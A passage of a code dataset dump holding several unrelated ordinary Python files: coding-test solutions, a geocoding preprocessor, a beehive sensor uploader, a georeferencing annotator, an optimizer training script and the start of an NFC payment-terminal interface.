confirm(W,sw,i):\n for j in range(len(sw)):\n if W[i+j]!=sw[j]:\n return False\n return True\n\nfor _ in range(1,11):\n t=int(input())\n sw=[i for i in input()]\n W=[i for i in input()]\n n=0\n for i in range(len(W)-len(sw)+1):\n if W[i]==sw[0]:\n if confirm(W,sw,i):\n n+=1\n print(f'#{t} {n}')\n\n","repo_name":"koreamarin/09.Coding_test","sub_path":"Python/02.SWEA/D3/01213_String.py","file_name":"01213_String.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30757451307","text":"import datetime\nfrom geopy.geocoders import Nominatim\n\nLOC_USER_AGENT = \"Google Maps\"\n\n\nclass Preprocessor:\n ALLOWED_DELIVERY_TYPES = [\n 'Economy registered letter',\n 'Priority registered letter',\n ]\n\n DEFAULT_DELIVERY_TYPE = 'List polecony ekonomiczny'\n\n @staticmethod\n def get_address_coordinates(address: str) -> (float, float):\n try:\n geolocator = Nominatim(user_agent=LOC_USER_AGENT)\n location = geolocator.geocode(address)\n print(address + ' ' + str(location.latitude) + ' ' + str(location.longitude))\n except Exception as e:\n print(e.__str__())\n return None\n\n if location is None:\n return None\n return location.latitude, location.longitude\n\n @staticmethod\n def get_hour_category(dt: datetime.datetime) -> int:\n return dt.hour >= 15\n\n @staticmethod\n def get_delivery_time_hours(sending_dt: datetime.datetime, delivery_dt: datetime.datetime):\n return (delivery_dt - sending_dt).total_seconds() / 3600\n\n @staticmethod\n def get_vehicle_transport_time_hours(location1: str, location2: str) -> int:\n raise NotImplementedError\n\n @staticmethod\n def get_distance(location1: str, location2: str) -> float:\n raise NotImplementedError\n","repo_name":"integratedintegral21/Mail-Delivery","sub_path":"predictor/preproessdata/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9822773790","text":"#!/usr/bin/python3\n\nimport serial\nimport requests\nimport datetime\n\ndef read_serial():\n data = arduino.readline().decode('utf-8').replace(' ', '')\n data = data.split(',')\n return data\n\nusb_port = '/dev/ttyACM0' # Arduino Port\narduino = serial.Serial(usb_port, 9600)\narduino.flush() \n\ntemp_super, 
temp_brood, humid_out, temp_out, humid_in, temp_roof, weight = read_serial()\nnow = datetime.datetime.now()\nnow = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nweight = weight.replace('\\r\\n', '')\n\njsonData = { 'created_at': now,\n 'weight': weight,\n 'temp_roof': temp_roof,\n 'temp_super_box': temp_super,\n 'temp_brood_box': temp_brood,\n 'temp_out': temp_out,\n 'humid_in': humid_in,\n 'humid_out': humid_out}\n\n# x = requests.post('https://givebeesachance.herokuapp.com/hiveData', json = jsonData)\nx = requests.post('url', json = jsonData)","repo_name":"Jak7774/honeybees","sub_path":"SendBeeData.py","file_name":"SendBeeData.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20737951907","text":"\"\"\"Defines class to describe how a georeference was determined\"\"\"\nimport logging\nimport os\nimport re\n\nfrom .evaluator import MatchEvaluator\nfrom ....bots.geonames import CODES_COUNTRIES\nfrom ....config import CONFIG\nfrom ....databases.georef_job import Session, Localities, Uncertainties\nfrom ....tools.geographic_operations.kml import Kml\nfrom ....utils.standardizers import LocStandardizer\nfrom ....utils import oxford_comma\n\n\n\n\nlogger = logging.getLogger(__name__)\n\n\n\n\nclass MatchAnnotator(MatchEvaluator):\n \"\"\"Describes how georeference was determined\"\"\"\n std = LocStandardizer()\n\n\n def __init__(self, *args, **kwargs):\n super(MatchAnnotator, self).__init__(*args, **kwargs)\n self.description = None\n\n\n @property\n def selected(self):\n \"\"\"Returns list of sites used to determine the georeference\"\"\"\n return self.interpreted_as('selected')\n\n\n def describe(self):\n \"\"\"Describes the geoerefence\"\"\"\n if self.description:\n return self.description\n self.save_parsed()\n if self.interpreted_as('selected'):\n # Calculate distance from original coordinates to active features\n if self.site.geometry:\n self.get_uncertainty()\n desc = []\n for method in [\n self._describe_selection,\n self._describe_filter,\n self._describe_uncertainty,\n self._describe_multiples,\n self._describe_encompassing,\n self._describe_intersecting,\n self._describe_less_specific,\n self._describe_more_specific,\n self._describe_ignored,\n self._describe_missed,\n self._describe_sources\n ]:\n try:\n desc.append(method())\n except AttributeError as e:\n logger.error(str(e), exc_info=e)\n desc = '\\n'.join([s for s in self._describe_miss() if s])\n break\n else:\n desc = '. 
'.join([s for s in desc if s]) + '.'\n selected = self.interpreted_as('selected')\n desc = desc.replace('(s)', '' if len(selected) == 1 else 's')\n else:\n desc = '\\n'.join([s for s in self._describe_miss() if s])\n # Add interpretations to debug\n for loc_id, status in self.interpreted.items():\n site = self.expand(loc_id)\n logger.debug('{} ({}): {}'.format(site.name, loc_id, status))\n logger.debug('Description:\\n{}'.format(desc))\n self.description = desc\n return desc\n\n\n def strong_match(self):\n \"\"\"Tests if georeference appears strong\"\"\"\n return (len(self.selected) == 1\n and not self.missed()\n and not self.leftovers)\n\n\n def kml(self, fn, refsite=None):\n \"\"\"Saves results as KML\"\"\"\n kml = Kml()\n try:\n kml.add_site(self.result, 'final')\n except AttributeError:\n pass\n if refsite is not None and refsite.geometry:\n kml.add_site(refsite, 'measured')\n # Get all selected and candidate sites\n candidates = self.sites[:]\n\n statuses = {'rejected (encompassed)'}\n candidates.extend(self.interpreted_as(statuses))\n\n for site in self.active():\n if site.site_kind not in {'CONT', 'OCN'}:\n candidates.append(site)\n for site in self.interpreted_as('selected'):\n candidates.extend(site.related_sites)\n for site in self.expand(candidates):\n if site.radius_km <= 2000:\n kml.add_site(site, 'candidate')\n if not fn.endswith('.kml'):\n fn = '{}.kml'.format(fn)\n kml.save(os.path.join('kml', fn))\n\n\n def _describe_selection(self):\n \"\"\"Lists the selected names and gives gist of determination\"\"\"\n groups = self.group_by_name(self.interpreted_as('selected'))\n selected = []\n for name, group in groups.items():\n combined = group[0].combine(*group[1:])\n combined.verbatim_latitude = None\n combined.verbatim_longitude = None\n for attr, code in (\n ('county', 'admin_code_2'),\n ('state_province', 'admin_code_1'),\n ('country', 'country_code')):\n if not group[0].filter.get(code):\n setattr(combined, attr, None)\n combined.site_names = [name.split(':', 1)[1]]\n # Inherit certain attributes from selected site\n combined.related_sites = group[0].related_sites\n combined.url_mask = group[0].url_mask\n combined.geometry = self.geometry\n #if (combined.geometry\n # and not re.search(r'^\\d+$', combined.location_id)):\n # combined.radius_km = group[0].radius_km\n if len(group) > 1:\n combined.url_mask = 'multiple matching localities'\n selected.append(self.name(combined))\n constrained_to = self.interpreted_as('constrained')\n if constrained_to:\n constrained_to.sort(key=lambda s: s.radius_km)\n selected += [self.name(s) for s in constrained_to]\n mask = 'the intersection between {}'\n result = mask.format(oxford_comma(selected, delim='; '))\n else:\n mask = '{}' if len(selected) == 1 else 'a circle encompassing {}'\n result = mask.format(oxford_comma(selected, delim='; '))\n return 'Coordinates and uncertainty based on {}'.format(result)\n\n\n def _describe_miss(self):\n \"\"\"Lists names considered for a missed georeference\"\"\"\n desc = []\n desc.append('Terms checked: {}'.format(self.terms_checked))\n desc.append('Terms missed: {}'.format(self.missed()))\n mask = '{} (id={}, code={}, lat={:.1f}, lng={:.1f}, radius={:.1f} km)'\n for name, group in self.group_by_name(self._sites).items():\n # Limit to active sites\n group = [s for s in group if s in self.active()]\n if group:\n desc.append(name)\n for site in group:\n lng, lat = site.centroid.coords[0]\n summary = mask.format(site.name,\n site.location_id,\n site.site_kind,\n lat,\n lng,\n site.radius_km)\n desc.append('+ 
{}'.format(summary))\n else:\n desc.append('{} (no active sites)'.format(name))\n return desc\n\n\n def _describe_uncertainty(self):\n \"\"\"Describes how uncertainty compares to estimate of best possible\"\"\"\n estimated = self.estimate_minimum_uncertainty()\n if 0.9 * self.radius_km <= estimated <= 1.1 * self.radius_km:\n rel = 'is similar to'\n elif self.radius_km < estimated:\n rel = 'is smaller than'\n else:\n rel = 'exceeds'\n # Round the uncertainty radius\n if estimated < 1:\n estimated = 1\n if self.radius_km < 10:\n radius_km = '{:.1f}'.format(self.radius_km)\n if radius_km.endswith('.0'):\n radius_km = radius_km.split('.')[0]\n else:\n radius_km = int(round(self.radius_km))\n return ('The uncertainty radius ({} km) {} an estimate'\n ' of the minimum likely uncertainty radius calculated'\n ' based on the provided locality information'\n ' (~{} km)').format(radius_km, rel, int(round(estimated)))\n\n\n def _describe_filter(self):\n \"\"\"Describes common elements of filters for selected sites\"\"\"\n master = None\n for site in self.interpreted_as('selected'):\n if master is None:\n master = site.filter\n else:\n master = {k: v for k, v in master.items()\n if v and v == site.filter.get(k)}\n # Map admin codes back to names\n codes = {\n 'country_code': 'country',\n 'admin_code_1': 'state_province',\n 'admin_code_2': 'county'\n }\n master = {codes.get(k, k): v for k, v in master.items() if v}\n logger.debug('Final filter: {}'.format(master))\n ordered = CONFIG.routines.georeferencing.ordered_field_list\n fltr = [f['field'] for f in ordered if f['field'] in master]\n fltr = [self.field(f).replace('_', '/') for f in fltr]\n if fltr:\n return 'Feature(s) matched on {}'.format(oxford_comma(fltr))\n return\n\n\n def _describe_encompassing(self):\n \"\"\"Lists names encompassing the selected sites\"\"\"\n sites = []\n for site in self.interpreted_as('encompassing'):\n if site.field not in {'country', 'state_province', 'county'}:\n sites.append(site)\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to encompass the selected feature(s): {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_intersecting(self):\n \"\"\"Lists names intersecting the selected sites\"\"\"\n sites = self.interpreted_as('intersecting') + self.sites\n # Intersection with continent is not super interesting if country was matched\n countries = [s for s in self.active() if s.site_kind in CODES_COUNTRIES]\n if countries:\n sites = [s for s in sites if s.site_kind != 'CONT']\n if sites:\n mask = ('The following place names mentioned in this record'\n ' intersect the selected features: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_multiples(self):\n \"\"\"Lists names that matched multiple sited and gives interpretation\"\"\"\n selected = self.interpreted_as('selected')\n encompassed = self.interpreted_as('rejected (encompassed)')\n rejected = self.interpreted_as('rejected (interpreted elsewhere)')\n\n groups = self.group_by_name(selected + encompassed + rejected)\n sites = []\n for name, group in groups.items():\n count = len(group)\n if count > 1:\n name = self.quote(name.split(':', 1)[1])\n # Don't mention places that were ignored\n if name not in self.ignored():\n mask = '{} (n={})'\n if group[0].intersects_all(group[1:]):\n mask = 
'{} (n={}, all intersecting)'\n sites.append(mask.format(name, count))\n\n if sites:\n mask = ('The following place names mentioned in this record'\n ' match multiple places: {}. The final georeference ')\n if len(selected) == 1:\n name = sites[0].split(' (n=')[0]\n explanations = self.multiples.get(name, [])\n if len(set(explanations)) != 1:\n logger.warning('Could not explain \"{}\"'.format(name))\n mask += 'uses the best match on this name'\n else:\n mask += explanations[0]\n elif (\n len(groups) == 1\n and len(set([self.key(s) for s in selected])) == 1\n ):\n name = list(groups.keys())[0]\n count = [self.key(s) for s in selected].count(name)\n if count == len(selected):\n mask += 'includes all features matching this name'\n else:\n mask += 'uses {count} features matching this name'\n else:\n mask += ('encompasses the features matching each place name'\n ' with the smallest distance between them')\n return mask.format(oxford_comma(sites))\n return\n\n\n def _describe_less_specific(self):\n \"\"\"Lists names that were less specific than the selected sites\"\"\"\n sites = self.interpreted_as('less specific')\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to describe less specific features and'\n ' were ignored: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_more_specific(self):\n \"\"\"Lists names that were more specific than the selected sites\"\"\"\n sites = self.interpreted_as('more specific')\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to describe more specific features but could'\n ' not be matched: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_ignored(self):\n \"\"\"Lists names that could not be reconciled with the selected sites\"\"\"\n\n # Exclude generic features signified by curly braces\n sites = [s for s in self.ignored() if not re.match(r'^{.*}$', s)]\n\n if sites:\n mask = ('The following place names mentioned in this record'\n ' could not be reconciled with other locality info'\n ' and were ignored: {}')\n return mask.format(oxford_comma(sorted(set(sites))))\n return\n\n\n def _describe_missed(self):\n \"\"\"Lists names that could not be matched at all\"\"\"\n stmt = []\n missed = self.missed()\n if missed:\n mask = ('The following place names mentioned'\n ' in this record were not found: {}')\n stmt.append(mask.format(oxford_comma(missed)))\n ignored = [s for s in self.ignored() if re.match(r'^{.*}$', s)]\n if self.leftovers or ignored:\n stmt.append('Some data in this record could not be interpreted')\n return '. 
'.join(stmt) if stmt else None\n\n\n def _describe_sources(self):\n \"\"\"Lists sources that provided base coordinates and geometries\"\"\"\n if self.sources:\n mask = 'This georeference is based on data from {}'\n return mask.format(oxford_comma(self.sources))\n return\n\n\n def get_uncertainty(self):\n \"\"\"Calculates distance between each feature and a reference site\"\"\"\n session = Session()\n for site in self.active():\n site_kind = site.site_kind\n if site_kind.isupper() and '_' in site.location_id:\n site_kind += '_MOD'\n threshold_km = max([self.site.radius_km + 1, 500])\n row = Uncertainties(\n occurrence_id=self.site.location_id,\n site_num=site.location_id,\n site_name=site.name,\n site_kind=site_kind,\n radius=site.radius_km,\n dist_km=site.centroid_dist_km(self.site, threshold_km)\n )\n try:\n session.add(row)\n session.commit()\n except:\n session.rollback()\n session.close()\n\n\n def name(self, site):\n \"\"\"Returns a descriptive name for a site\"\"\"\n higher_geo = []\n names = [None, None, None]\n if site.radius_km < 500:\n names = [site.county, site.state_province, site.country]\n for i, name in enumerate(names):\n if not i and site.country == 'United States':\n pattern = r'\\b(County|Co\\.?|Area)$'\n counties = []\n for county in name:\n if not re.search(pattern, county, flags=re.I):\n county = '{} Co.'.format(county)\n else:\n county = county.replace('County', 'Co.')\n counties.append(county)\n name = counties\n if isinstance(name, list):\n name = '/'.join(name)\n if name and (not higher_geo or higher_geo[-1] != name):\n higher_geo.append(name)\n options = ['ADM2', 'ADM1', 'PC']\n pattern = '|'.join([o for i, o in enumerate(options) if names[i]])\n if (site.related_sites\n or not higher_geo\n or not re.match(pattern, site.site_kind)):\n higher_geo.insert(0, self.quote(site.name, bool(site.related_sites)))\n loc = ', '.join([n for n in higher_geo if n])\n # Get the url, cleaning up the trailer on proximity matches\n source = None\n if site.url:\n source = re.sub(r'\\_[A-Z]+$', '', site.url) if site.url else None\n if site.site_kind.isupper():\n source = f'{site.site_kind}: {source}'\n elif site.site_source:\n source = f'via {site.site_source}'\n return '{} ({})'.format(loc, source) if source else loc\n\n\n def save_parsed(self):\n \"\"\"Saves parses of locality names to a SQLite database\"\"\"\n session = Session()\n attrs = ['location_id', 'country', 'state_province', 'county']\n base = {}\n for attr in attrs:\n val = getattr(self.site, attr)\n if isinstance(val, list):\n val = ' | '.join(val)\n base[attr if attr != 'location_id' else 'occurrence_id'] = val\n missed = {s.split('=', 1)[-1].strip('\"') for s in self.missed()}\n for field, features in self.features.items():\n for parsed in features:\n full = getattr(self.site, field)\n if isinstance(full, list):\n full = ' | '.join(full)\n row = {\n 'field': field,\n 'parser': parsed.kind,\n 'parsed': str(parsed),\n 'verbatim': parsed.verbatim,\n 'verbatim_full': full,\n 'missed': 1 if parsed.verbatim.strip('\"') in missed else 0,\n 'has_poly': None,\n }\n row.update(base)\n row = Localities(**row)\n try:\n session.add(row)\n session.commit()\n except:\n session.rollback()\n session.close()\n\n\n @staticmethod\n def quote(val, use_quotes=False):\n \"\"\"Adds quotes to a phrase\"\"\"\n if not use_quotes:\n use_quotes = '(' in val or re.search(r'\\b[a-z]{4,}\\b', val)\n return '\"{}\"'.format(val.strip('\"').replace('\"', \"'\")) if use_quotes else 
val\n","repo_name":"adamancer/nmnh_ms_tools","sub_path":"nmnh_ms_tools/routines/georeferencer/evaluators/annotator.py","file_name":"annotator.py","file_ext":"py","file_size_in_byte":19076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42998947382","text":"import argparse\r\nimport os\r\nimport time\r\nimport json\r\nimport hashlib\r\n\r\nfrom tqdm import tqdm\r\nimport torch\r\nfrom torch import nn\r\nimport numpy as np\r\n\r\nfrom models import get_model\r\nfrom ioutils import get_dataset, Logger\r\nfrom vadam import Vadam2\r\nfrom vlaprop import VLaProp\r\nfrom vsgd import VSGD\r\n\r\nparser = argparse.ArgumentParser(description='Volumization Evaluation')\r\n\r\n# task related\r\nparser.add_argument('--dataset', type=str, default=\"MNIST\")\r\nparser.add_argument('--model', type=str, default=\"DNN\")\r\nparser.add_argument('--task_id', type=str, default='default')\r\nparser.add_argument('--cuda', type=int, default=1)\r\nparser.add_argument('--save', type=bool, default=False)\r\n# optimizer related\r\nparser.add_argument('--lr', type=float, default=1e-4, help=\"learning rate\")\r\nparser.add_argument('--v', type=float, default=1, help=\"limitation of volumization\")\r\nparser.add_argument('--alpha', type=float, default=1.0, help=\"alpha\")\r\nparser.add_argument('--auto', type=float, default=True, help=\"Kaiming-V or not\")\r\nparser.add_argument('--weight_decay', type=float, default=0, help=\"default is None\")\r\nparser.add_argument('--batch_size', type=int, default=128, help=\"batch size\")\r\nparser.add_argument(\"--num_epochs\", type=int, default=100, help=\"number of epochs\")\r\nparser.add_argument(\"--lq\", type=bool, default=False)\r\nparser.add_argument(\"--optimizer\", type=str, default='adam')\r\n# noise ratio\r\nparser.add_argument('--noise_ratio', type=float, default=0.0, help=\"noise ratio\")\r\n\r\nparams = parser.parse_args()\r\nmodel_for_data = {\"MNIST\": [\"DNN\"],\r\n \"IMDB\": [\"LSTMATT\", \"LSTM\"],\r\n \"CIFAR10\": [\"ResNet18\"]}\r\nassert params.model in model_for_data[params.dataset]\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda:{}'.format(params.cuda))\r\nelse:\r\n device = 'cpu'\r\n\r\ntimestamp = time.strftime(\"%y%m%d-%H%M%S\", time.localtime())\r\nlog_dir_name = os.path.join('log', params.dataset)\r\nparam_dict = vars(params)\r\nconfig_hash = hashlib.sha224(json.dumps(param_dict).encode()).hexdigest()\r\ntask_name = params.task_id + '-' + timestamp + config_hash[:4] + \"-\" + params.model\r\n\r\n\r\ntrain_logger = Logger(task_name=task_name,\r\n dir_name=log_dir_name,\r\n heading=['epoch', 'train_loss', 'train_acc', 'val_loss', 'val_acc', 'test_loss', 'test_acc'],\r\n )\r\nwith open(os.path.join(log_dir_name, task_name + \".meta\"), mode='wt') as f:\r\n json.dump(param_dict, f)\r\n\r\n\r\ndef lq_loss(logits, Y, q=0.7):\r\n index1 = torch.arange(len(Y))\r\n prob = torch.nn.functional.softmax(logits, 1)\r\n loss = 1 - prob[index1, Y.view(-1)] ** q\r\n # print(loss.mean())\r\n return loss.mean() / q\r\n\r\n\r\nif params.lq:\r\n criterion = lq_loss\r\nelse:\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n\r\ndef train_model(model, _iter):\r\n total_epoch_loss = 0\r\n total_epoch_acc = 0\r\n\r\n model.train()\r\n for X, Y in tqdm(_iter):\r\n X, Y = X.to(device), Y.to(device)\r\n\r\n optim.zero_grad()\r\n logits = model(X)\r\n preds = torch.max(logits, 1)[1].view(Y.size())\r\n loss = criterion(logits, Y)\r\n loss.backward()\r\n optim.step()\r\n\r\n num_corrects = (preds == 
Y).float().sum()\r\n acc = 100.0 * num_corrects / len(Y)\r\n\r\n total_epoch_loss += loss.item()\r\n total_epoch_acc += acc.item()\r\n\r\n return total_epoch_loss / len(_iter), total_epoch_acc / len(_iter)\r\n\r\n\r\ndef eval_model(model, _iter):\r\n total_epoch_loss = 0\r\n total_epoch_acc = 0\r\n model.eval()\r\n with torch.no_grad():\r\n for idx, (X, Y) in enumerate(_iter):\r\n X = X.to(device)\r\n Y = Y.to(device)\r\n\r\n logits = model(X)\r\n preds = torch.max(logits, 1)[1].view(Y.size())\r\n loss = criterion(logits, Y)\r\n\r\n num_corrects = (preds == Y).float().sum()\r\n acc = 100.0 * num_corrects / len(Y)\r\n\r\n total_epoch_loss += loss.item()\r\n total_epoch_acc += acc.item()\r\n\r\n return total_epoch_loss / len(_iter), total_epoch_acc / len(_iter)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n embedding, train_iter, valid_iter, test_iter = get_dataset(params.dataset,\r\n rate=params.noise_ratio,\r\n batch_size=params.batch_size)\r\n model_params = {}\r\n if params.dataset == \"IMDB\":\r\n model_params[\"output_size\"] = 2\r\n model_params[\"hidden_size\"] = 256\r\n\r\n if params.model == \"LSTM\" or params.model==\"LSTMATT\":\r\n model_params[\"weights\"] = embedding\r\n\r\n if params.dataset == \"CIFAR100\":\r\n model_params[\"num_classes\"] = 100\r\n\r\n model = get_model(params.model, **model_params)\r\n model.to(device)\r\n\r\n if params.optimizer == \"laprop\":\r\n optim = VLaProp(model.parameters(), lr=params.lr, eps=1e-15,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n elif params.optimizer == \"adam\":\r\n optim = Vadam2(model.parameters(), lr=params.lr, eps=1e-15,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n elif params.optimizer == \"sgd\":\r\n optim = VSGD(model.parameters(), lr=params.lr,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n\r\n test_acc_list = []\r\n for epoch in range(params.num_epochs):\r\n train_loss, train_acc = train_model(model, train_iter)\r\n val_loss, val_acc = eval_model(model, valid_iter)\r\n test_loss, test_acc = eval_model(model, test_iter)\r\n test_acc_list.append(test_acc)\r\n train_logger.append(epoch + 1, train_loss, train_acc, val_loss, val_acc, test_loss, test_acc)\r\n print(np.max(test_acc_list), np.mean(test_acc_list[-10:]))\r\n if params.save:\r\n model.cpu()\r\n torch.save(model.state_dict(), \"{}nr{}v{}alpha{}.pt\".format(task_name, params.noise_ratio, params.v, params.alpha))\r\n\r\n","repo_name":"zihao-wang/volumization","sub_path":"eval_vol.py","file_name":"eval_vol.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25561095078","text":"import datetime\n\nclass DayOverview:\n\n def __init__(self, dateRecorded, startTime, leavingTime, workHours,\n breakHours, lunchDuration, morningScheduleId, prayer):\n \"\"\"Instantiates the DayOverview Object\"\"\"\n self.dateRecorded = dateRecorded # type: datetime.date\n self.startTime = startTime # type: datetime.time\n self.leavingTime = leavingTime # type: datetime.time\n self.workHours = workHours # type: float\n self.breakHours = breakHours # type: float\n self.lunchDuration = lunchDuration # type: float\n self.morningScheduleId = morningScheduleId # type: int\n self.prayer = prayer # type: boolean\n \n def __str__(self) -> str:\n return f\"\"\"[dateRecorded: {self.dateRecorded}, startTime: {self.startTime}, leavingTime: 
{self.leavingTime},\n workHours: {self.workHours}, breakHours: {self.breakHours}, lunchDuration: {self.lunchDuration},\n morningScheduleId: {self.morningScheduleId}, prayer: {self.prayer}]\"\"\"","repo_name":"Adnan-Sait/task-tracker","sub_path":"models/DayOverview.py","file_name":"DayOverview.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18880436967","text":"# 2020.07.10\n# Problem Statement:\n# https://leetcode.com/problems/zigzag-conversion/\n\nclass Solution:\n def convert(self, s: str, numRows: int) -> str:\n # initialize answer string\n answer = \"\"\n \n # check empty input\n if s == \"\":\n return \"\"\n \n # calculate how many element are in each group\n # group means patterned element group in shape\n # ex: a g\n # b f h l\n # c e i k\n # d j\n # then abcdef is a group\n group_size = numRows * 2 - 2\n \n if group_size == 0:\n return s\n \n # calculate total number of groups\n if len(s) % group_size == 0:\n group_num_total = len(s) // group_size\n else:\n group_num_total = len(s) // group_size + 1\n\n # for each element, store which group it's in and its position in its group\n # build a dictionary to do the search faster later, where key = (group number, group_index), value = index\n dictionary = {}\n\n for i in range(0, len(s)):\n dictionary[(i // group_size, i % group_size)] = i\n\n # index should go before group\n # from the first group to the last\n for index in range(0, group_size//2 + 1):\n # from the first index to the middle\n for group in range(0, group_num_total):\n # get the element to store\n if (group, index) in dictionary.keys():\n answer = answer + s[dictionary[(group, index)]]\n # consider the cases when 2 elements are on the same row\n # store the element as well\n if index != 0 and index != group_size//2:\n if (group, group_size-index) in dictionary.keys():\n answer = answer + s[dictionary[(group, group_size-index)]]\n \n return answer","repo_name":"ljn1999/LeetCode-problems","sub_path":"q1-25/q06.py","file_name":"q06.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"44688531075","text":"# Url: https://leetcode.com/problems/substring-with-concatenation-of-all-words/\n# Related Topics:\n# String HashTable TwoPointers\n\n# Example:\n# Input:\n# s = \"barfoothefoobarman\",\n# words = [\"foo\",\"bar\"]\n# Output: [0,9]\n\n\nfrom collections import Counter\nclass Solution:\n def findSubstring(self, s, words):\n \"\"\"\n :type s: str\n :type words: List[str]\n :rtype: List[int]\n \"\"\"\n if not len(words) or not len(words[0]) or not len(s):\n return []\n num, l = len(words), len(words[0])\n target = Counter(words)\n w2i = {w: i for i, w in enumerate(target.keys())}\n ans = []\n for i in range(len(s)-l*num+1):\n cur = s[i: i+l]\n if cur in w2i:\n seen = [0] * num\n seen[w2i[cur]] = 1\n for j in range(i + l, i + num * l, l):\n w = s[j: j+l]\n if w in w2i and seen[w2i[w]] != target[w]:\n seen[w2i[w]] += 1\n else:\n break\n else:\n ans.append(i)\n return ans","repo_name":"EVASHINJI/LeetCode","sub_path":"Daily/30 Substring with Concatenation of All Words.py","file_name":"30 Substring with Concatenation of All Words.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6321147079","text":"def argsconnect(argsin, argsou):\n\n argstocheck = argsin\n argstorelat = 
argsou\n\n atclength = len(argstocheck)\n atrlength = len(argstorelat)\n\n gendict = {}\n\n for num in range(0, atclength):\n\n gendict[str(argstocheck[num])] = str(argstorelat[num])\n\n\n return gendict\n","repo_name":"T0PK3K3L1TE/Abaddon","sub_path":"Abaddon/System/StringConverter/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27776175584","text":"from DAL.ApiController import getPaymentResponse\nfrom PL.AbstractBaseWindow import BaseWindow\nfrom DAL.NfcController import WriteCard, ReadCard, SecureCard\nfrom DAL.ApiController import getToken\nfrom BLL.CustomErrors import *\nimport time\n\n\nclass MainWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Welkom bij Ace')\n self.disp.image(self.image)\n self.disp.display()\n\nclass ModeWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Kies modus')\n self.drawText(30, 30, '1 | PIN mode')\n self.drawText(30, 50, '2 | Secure mode')\n self.Display()\n\nclass AmountWindow(BaseWindow):\n\n def __init__(self, disp):\n self.numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Voer bedrag in')\n self.drawText(50, 30, '0.00')\n self.Display()\n\n def getAmount(self, keypad):\n amount = ''\n while True:\n pkey = keypad.pressed_keys\n if pkey:\n self.newImage()\n self.drawText(40, 10, 'Bedrag:')\n self.drawText(5, 50, '* | Terug')\n self.drawText(80, 50, '# | OK')\n time.sleep(0.25)\n if pkey[0] == '#':\n break\n elif pkey[0] == '*' and len(amount) > 0:\n amount = amount[:-1]\n if not amount:\n self.drawText(50, 30, '0.00')\n else:\n self.drawText(50, 30, str(int(amount) / float(100)))\n self.Display()\n elif pkey[0] in self.numbers:\n amount += str(pkey[0])\n self.drawText(50, 30, str(int(amount) / float(100)))\n self.Display()\n else:\n continue\n return int(amount)/float(100)\n\nclass PinWindow(BaseWindow):\n\n def __init__(self, disp, amount):\n self.amount = amount\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(30, 30, \"Uw kaart AUB\")\n self.Display()\n\n def getPin(self, keypad):\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(30, 30, \"Uw PIN AUB\")\n self.Display()\n numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n time.sleep(1)\n pin = ''\n output = ''\n while True:\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(5, 50, '* | Terug')\n self.drawText(80, 50, '# | OK')\n pkey = keypad.pressed_keys\n if pkey:\n time.sleep(0.25)\n if pkey[0] == '#':\n break\n elif pkey[0] == \"*\" and len(pin) > 0:\n pin = pin[:-1]\n output = output[:-2]\n self.drawText(45, 30, output)\n self.Display()\n elif pkey[0] in numbers and len(pin) < 4:\n pin += str(pkey[0])\n output += '*'\n output += ' '\n self.drawText(45, 30, output)\n self.Display()\n else:\n continue\n return pin\n\nclass PaymentWindow(BaseWindow):\n\n def __init__(self, disp, keypad, pn532):\n self.keypad = keypad\n self.pn532 = pn532\n super().__init__(disp)\n\n def show(self):\n 